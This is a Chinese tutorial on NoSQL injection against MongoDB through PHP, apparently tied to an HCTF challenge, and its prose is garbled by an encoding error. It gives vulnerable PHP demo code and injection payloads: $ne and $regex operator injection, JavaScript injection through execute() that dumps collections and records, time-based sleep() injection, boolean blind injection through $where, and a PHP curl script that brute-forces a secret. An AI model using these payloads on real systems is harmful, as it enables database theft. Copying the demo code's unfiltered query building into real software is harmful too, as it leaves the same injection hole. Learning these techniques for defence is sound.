| 0x00
Ç°ÑÔ
¹ØÓÚmongodbµÄ»ù±¾°²×°ÔËÐвÙ×÷ÒÔ¼°php²Ù×÷mongodb£¬Çë²Î¿¼ÎÒÒÔÇ°µÄÎÄÕÂ
phpϲÙ×÷mongodbµÄÌû×Ó¹úÄÚÒѾÓÐÁË£¬µ«ÊÇ»ùÓÚphpÏÂ×¢Èë¹¥»÷mongodbµÄÎÄÕÂËƺõ»¹±È½ÏÉÙ¡£±¾ÎÄÊDZÊÕßÔÚѧϰ¡¢²éÔÄÁË´óÁ¿×ÊÁϺóµÄһЩ×ܽᣬÎÄÖÐÉæ¼°µÄ¹¥»÷ÊÖ·¨¼°Æä֪ʶ²úȨȫ²¿¹éÔ×÷ÕßËùÓУ¬ÎÒÖ»ÊÇ´ó×ÔÈ»µÄ°áÔ˹¤¡£Î´Õ÷µÃ±ÊÕßͬÒ⣬ÇëÎðתÔØ¡£
0x01 ¸ÅÀ¨
phpϲÙ×÷mongodb´óÖÂÓÐÒÔÏÂÁ½ÖÖ·½Ê½
1.ÓÃmongoÀàÖÐÏàÓ¦µÄ·½·¨Ö´ÐÐÔö²é¼õ¸Ä ±ÈÈ磺
<?php
$mongo = new mongoclient();
$db = $mongo->myinfo; //Ñ¡ÔñÊý¾Ý¿â
$coll = $db->test; //Ñ¡Ôñ¼¯ºÏ
$coll->save(); //Ôö
$coll->find(); //²é
$coll->remove(); //¼õ
$coll->update(); //¸Ä |
´Ëʱ£¬´«µÝ½øÈëµÄ²ÎÊýÊÇÒ»¸öÊý×é¡£
2.ÓÃexecute·½·¨Ö´ÐÐ×Ö·û´® ±ÈÈ磺
<?php
$mongo = new mongoclient();
$db = $mongo->myinfo; //Ñ¡ÔñÊý¾Ý¿â
$query = "db.table.save({'newsid':1})"; //Ôö
$query = "db.table.find({'newsid':1})"; //²é
$query = "db.table.remove({'newsid':1})"; //¼õ
$query = "db.table.update({'newsid':1},{'newsid',2})"; ¸Ä
$result = $db->execute($query); |
´Ëʱ£¬´«½ø·½·¨executeµÄ²ÎÊý¾ÍÊÇ×Ö·û´®±äÁ¿$query
ÌرðµÄ£¬´ËʱµÄ×Ö·û´®ÊéдÓ﷨ΪjsµÄÊéдÓï·¨¡£
¶ÔÓÚÒÔÉÏÁ½ÖÖ²»Í¬Ö´Ðз½Ê½£¬Óв»Í¬µÄ×¢Èë¹¥»÷·½Ê½¡£
0x02 ×¢Èë¹¥»÷
0.ÔÚ¹¥»÷Ç°£¬ÎÒÃÇÐèÒªÏȽ¨Á¢Ò»¸ö¼¯ºÏ£¬×÷Ϊ¹¥»÷µÄ»ù´¡¡£
Óû§testÊǹ¥»÷ÕßÒѾ֪µÀÕ˺ÅÃÜÂëµÄÒ»¸ö²âÊÔÕ˺ţ¬ÆäËûÕ˺ŵĻ°ÃÜÂëËæ»ú¡£Ïëͨ¹ý×¢Èë»ñÈ¡ÆäËûÕ˺ŵÄÃÜÂë¡£
1.Êý×é°ó¶¨Ê±µÄ×¢Èë
Ò»¸öÊý×é°ó¶¨µÄ²éѯdemoÈçÏ£º
<?php
$mongo = new mongoclient();
$db = $mongo->myinfo; //Ñ¡ÔñÊý¾Ý¿â
$coll = $db->test; //Ñ¡Ôñ¼¯ºÏ
$username = $_GET['username'];
$password = $_GET['password'];
$data = array(
'username'=>$username,
'password'=>$password
);
$data = $coll->find($data);
$count = $data->count();
if ($count>0) {
foreach ($data as $user) {
echo 'username:'.$user['username']."</br>";
echo 'password:'.$user['password']."</br>";
}
}
else{
echo 'δÕÒµ½';
}
?> |
´ËʱµÄ¹¥»÷ÀûÓÃÁËphp¿ÉÒÔ´«µÝÊý×é²ÎÊýµÄÒ»¸öÌØÐÔ¡£
µ±´«ÈëµÄurlΪ£º
http://127.0.0.1/2.php?username=test&password=test
Ö´ÐÐÁËÓï¾ä£º
db.test.find({username:'test',password:'test'}); |
Èç¹û´Ëʱ´«ÈëµÄurlÈçÏÂ:
http://127.0.0.1/2.php?username[xx]=test&password=test |
Ôò$username¾ÍÊÇÒ»¸öÊý×飬Ҳ¾ÍÏ൱ÓÚÖ´ÐÐÁËphpÓï¾ä£º
$data = array(
'username'=>array('xx'=>'test'),
'password'=>'test'); |
¶ømongodb¶ÔÓÚ¶àάÊý×éµÄ½âÎöʹ×îÖÕÖ´ÐÐÁËÈçÏÂÓï¾ä£º
db.test.find({username:{'xx':'test'},password:'test'}); |
ÀûÓôËÌØÐÔ£¬ÎÒÃÇ¿ÉÒÔ´«ÈëÊý¾Ý£¬ÊÇÊý×éµÄ¼üÃûΪһ¸ö²Ù×÷·û£¨´óÓÚ£¬Ð¡ÓÚ£¬µÈÓÚ£¬²»µÈÓڵȵȣ©£¬Íê³ÉһЩ¹¥»÷ÕßÔ¤ÆڵIJéѯ¡£
È磬´«Èëurl:
http://127.0.0.1/2.php?username[$ne]=test&password[$ne]=test |
½á¹ûÈçͼ
ÒòΪ´«ÈëµÄ¼üÃû$neÕýÊÇÒ»¸ömongodb²Ù×÷·û£¬×îÖÕÖ´ÐÐÁËÓï¾ä£º
db.test.find({username:{'$ne':'test'},password:{'$ne':'test'}}); |
Õâ¾ä»°Ï൱ÓÚsql:
select * from test where username!='test' and password!='test'; |
Ö±½Ó±ãÀû³öËùÓм¯ºÏÖеÄÊý¾Ý¡£
Èç¹û´ËʱµÄÓû§ÃûÓëÃÜÂë²»ÄÜ»ØÏÔ£¬Ö»ÊÇ·µ»ØÒ»¸öÂß¼ÉϵÄÕýÎóÅжϡ£
ÄÇôÎÒÃÇ¿ÉÒÔ²ÉÓÃ$regex²Ù×÷·ûÀ´Ò»Î»Ò»Î»»ñÈ¡Êý¾Ý¡£
°¸ÀýÑÝʾ£ºhttp://121.40.86.166:23339/
ÕâÊÇhctfÖеÄÒ»µÀÌâÄ¿¡£
²Â²âÆäphp´úÂë´ó¸ÅÈçÏÂ
<?php
$mongo = new mongoclient();
$db = $mongo->myinfo; //Ñ¡ÔñÊý¾Ý¿â
$coll = $db->test; //Ñ¡Ôñ¼¯ºÏ
$lock = $_POST['lock'];
$key = $_POST['key'];
if (is_array($lock)) {
$data = array(
'lock'=>$lock);
$data = $coll->find($data);
if ($data->count()>0) {
echo 'the lock is right,but wrong key';
}else{
echo 'lock is wrong';
}
}else{
if ($lock == 'aabbccdd'&&$key=='aabbccdd') {
echo 'Your flag is xxxxxxx';
}else{
echo 'lock is wrong';
}
}
?> |
ÕâÑùµÄ»°£¬ÒòΪֻÓС°ÕýÈ·¡±»òÕß¡°´íÎó¡±Á½ÖÖ»ØÏÔ£¬ÎÒÃÇÖ»ÄÜͨ¹ýÕýÔòÅжÏÀ´Ò»Î»Ò»Î»¶ÁÈ¡lockµÄÄÚÈÝÁË¡£
¶ÔÓÚ¸ÃÌâµÄÀûÓÃpayloadÈçÏ£º
<?php
$ch=curl_init();
curl_setopt($ch,CURLOPT_URL,'http://121.40.86.166:23339/');
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch,CURLOPT_POST,1);
$ori = '0123456789abcdefghijklmnopqrstuvwxyz';
$str = '';
for ($i=0; $i <10 ; $i++) {
for ($j=0; $j <strlen($ori) ; $j++) {
$post = 'key=1&lock[$regex]=^'.$str.$ori[$j];
curl_setopt($ch,CURLOPT_POSTFIELDS,$post);
$data=curl_exec($ch);
if (strlen($data) == 319) {
$str.=$ori[$j];
echo $str."\r\n";
break;
}
}
}
?> |
½á¹ûÈçͼ£º
Ï൱ÓÚÔÚÊý¾Ý¿âÖжà´ÎÖ´Ðвéѯ:
db.test.find({lock:{'$regex':'^a'}}); db.test.find({lock:{'$regex':'^b'}}); db.test.find({lock:{'$regex':'^c'}});
db.test.find({lock:{'$regex':'^ca'}}); ¡¡ ¡¡ db.test.find({lock:{'$regex':'^aabbccdd'}}); |
×îÖÕÈ«²¿²Â³ö×Ö·û´®µÄÄÚÈÝ,ÏàËÆÓësql×¢ÈëÖеÄäע¡£
2.Æ´½Ó×Ö·û´®Ê±µÄ×¢Èë
ÒòΪ×Ö·û´®µÄÆ´½Ó·½Ê½¶àÖÖ¶àÑù£¬²»Í¬³ÌÐòÔ±Ò²Óв»Í¬µÄÊéдϰ¹ß¡£
±¾ÎÄÖнö¾Ù¼¸¸ödemoΪÀý¡£
<?php
$username = $_GET['username'];
$password = $_GET['password'];
$query = "var data = db.test.findOne({username:'$username',password:'$password'});return data;";
//$query = "return db.test.findOne();";
//echo $query;
$mongo = new mongoclient();
$db = $mongo->myinfo;
$data = $db->execute($query);
if ($data['ok'] == 1) {
if ($data['retval']!=NULL) {
echo 'username:'.$data['retval']['username']."</br>";
echo 'password:'.$data['retval']['password']."</br>";
}else{
echo 'δÕÒµ½';
}
}else{
echo $data['errmsg'];
}
?> |
¹¥»÷·½Ê½£º
http://127.0.0.1/1.php?username=test'&password=test |
±¨´í¡£ Ïë°ì·¨±ÕºÏÓï¾ä¡£
http://127.0.0.1/1.php?username=test'});return {username:1,password:2}//&password=test |
¸ÃÓï¾äÄÜ·µ»ØÒ»¸öÊý×飬username¼üÖµÊÇ1£¬password¼üÖµÊÇ2.
±¬mongodb°æ±¾
http://127.0.0.1/1.php?username=test'});return {username:tojson(db.getCollectionNames()),password:2};//&password=test |
±¬ËùÓм¯ºÏÃû
PS:ÒòΪdb.getCollectionNames()·µ»ØµÄÊÇÊý×飬ÐèÒªÓÃtojsonת»»Îª×Ö·û´®¡£²¢ÇÒmongodbº¯ÊýÇø·Ö´óСд¡£
±¬test¼¯ºÏµÄµÚÒ»ÌõÊý¾Ý
http://127.0.0.1/1.php?username=test'});return {username:tojson(db.test.find()[0]),password:2};//&password=test |
±¬test¼¯ºÏµÄµÚ¶þÌõÊý¾Ý
ÒòΪexecute·½·¨Ö§³Ö¶àÓï¾äÖ´ÐУ¬ËùÒÔ¿ÉÒÔÖ´ÐÐÌ«¶àÓï¾äÁË£¬²»ÑÝʾ~
µ±È»£¬ÓÐʱ¿ÉÄÜÓöµ½Ã»ÓÐÊä³ö·µ»ØÊý¾Ý£¬ÕâʱºòÔõô°ìÄØ£¿
Ôڸ߰汾Ï£¬Ìí¼ÓÁËÒ»¸öº¯Êýsleep()£¬¾ÍÊÇʱ¼ääע¿©~
PS:Ôڸ߰汾Ï£¬Ã²ËƲ»ÄÜÓÃ×¢ÊÍÓï¾ä£¬´ËÍâ¸ß°æ±¾»¹ÓÐÒ»¸öÐÂÌØÐÔ¾ÍÊÇĬÈÏ¿ªÆô´íÎó»ØÏÔ¡£±ÊÕß³¢ÊÔûÓÐ×¢Êͳɹ¦£¬Ö»ÄÜÓñպϵķ½·¨¡£
http://127.0.0.1/1.php?username=test'});if (db.version() > "0") { sleep(10000); exit; }var b=({a:'1&password=test |
³É¹¦ÑÓʱÁËÊ®Ãë¡£
ÁíÒ»¸ödemo
ÔÚMongdbÖпÉÒÔʹÓÃ$where²Ù×÷·û¡£Ï൱ÓÚsqlÓï¾äÖеÄwhereÏÞÖÆÓï¾ä¡£mongodbÖеÄ$where²Ù×÷·û³£³£ÒýÈëÒ»¸öjsµÄº¯ÊýÀ´×÷ΪÏÞÖÆÌõ¼þ£¬µ±jsº¯ÊýÖеÄ×Ö·û´®´æÔÚδ¹ýÂ˵ÄÓû§ÊäÈëʱ£¬×¢Èë¾Í²úÉúÁË¡£
·Ådemo£º
<?php
$mongo = new mongoclient();
$db = $mongo->myinfo; //Ñ¡ÔñÊý¾Ý¿â
$coll = $db->news; //Ñ¡Ôñ¼¯ºÏ
$news = $_GET['news'];
$function = "function() {if(this.news == '$news') return true}";
echo $function;
$result = $coll->find(array('$where'=>$function));
if ($result->count()>0) {
echo '¸ÃÐÂÎÅ´æÔÚ';
}else{
echo '¸ÃÐÂÎŲ»´æÔÚ';
}
?> |
ΪÁ˲âÊÔ£¬ÎÒ½¨Á¢ÁËÁ½¸ö¼¯ºÏ£¬Ò»¸öÊÇnews¼¯ºÏ£¬²éѯ¹ý³ÌÖдæÔÚ×¢Èë¡£ÁíÒ»¸öÊÇuser¼¯ºÏ£¬ÎÒÃÇҪעÈëµÃµ½ÆäÖеÄÊý¾Ý¡£
´úÂëÖеÄthis.newsÖ¸µÄ¾ÍÊDZíÖеÄnewsÀ¸£¨×ֶΣ©£¬ÉÏÃæµÄ´úÂë·Òë³ÉsqlÓï¾ä¾ÍÊÇ£º
select * from news where news='$news' |
¸ÃdemoµÄ×¢È뷽ʽ¿ÉÒԲο¼ÈçÏ£º
http://127.0.0.1/3.php?news=test |
·µ»ØÕý³£
http://127.0.0.1/3.php?news=test' |
·µ»Ø´íÎó
http://127.0.0.1/3.php?news=test'%26%26'1'=='1 |
·µ»ØÕý³£
http://127.0.0.1/3.php?news=test'%26%26'1'=='2 |
·µ»Ø´íÎó
ÖÁ´Ë¼ì²â³ö×¢È룬¿ªÊ¼»ñÈ¡Êý¾Ý¡£
http://127.0.0.1/3.php?news=test'%26%26db.getCollectionNames().length>0%26%26'1'=='1 |
·µ»ØÕý³££¬¼¯ºÏÊý´óÓÚ0
http://127.0.0.1/3.php?news=test'%26%26db.getCollectionNames().length==5%26%26'1'=='1 |
·µ»ØÕý³££¬¼¯ºÏÊýµÈÓÚ5
»ñÈ¡¼¯ºÏÃû³Æ
http://127.0.0.1/3.php?news=test'%26%26db.getCollectionNames()[0].length==6%26%26'1'=='1 |
·µ»ØÕý³££¬µÚÒ»¸ö¼¯ºÏÃû³Æ³¤¶ÈΪ6
http://127.0.0.1/3.php?news=test'%26%26db.getCollectionNames()[0][0]>'a'%26%26'1'=='1 |
·µ»ØÕý³££¬µÚÒ»¸ö¼¯ºÏÃû³ÆµÚÒ»¸ö×Ö·û´óÓÚa
http://127.0.0.1/3.php?news=test'%26%26db.getCollectionNames()[0][0]=='m'%26%26'1'=='1 |
·µ»ØÕý³££¬µÚÒ»¸ö¼¯ºÏÃû³ÆµÚÒ»¸ö×Ö·ûΪm
×îÖÕ¿ÉÒÔÆƽâ³ö´æÔÚuser¼¯ºÏ¡£
²éuser¼¯ºÏÖеĵÚÒ»ÌõÊý¾Ý¡£
http://127.0.0.1/3.php?news=test'%26%26tojson(db.user.find()[0])[0]=='{'%26%26'1'=='1 |
ÒòΪdb.user.find()·µ»ØµÄ²»ÊÇÒ»¸ö×Ö·û´®£¬ÎÞ·¨È¡³ö×Ö·û½øÐбȽϣ¬ÎÒÃÇ¿ÉÒÔ½«Ëüת»¯³ÉÒ»¸öjson×Ö·û´®£¬¾Í¿ÉÒԱȽÏÁË¡£
µÀÀí½²Ã÷°×ÁË£¬Ê£ÏµĶ¼ÊÇÌåÁ¦»î£¬ÓÃpython»òÕßphpдÏÂС½Å±¾¾ÍÄÜʵÏÖ×Ô¶¯»¯¡£
|
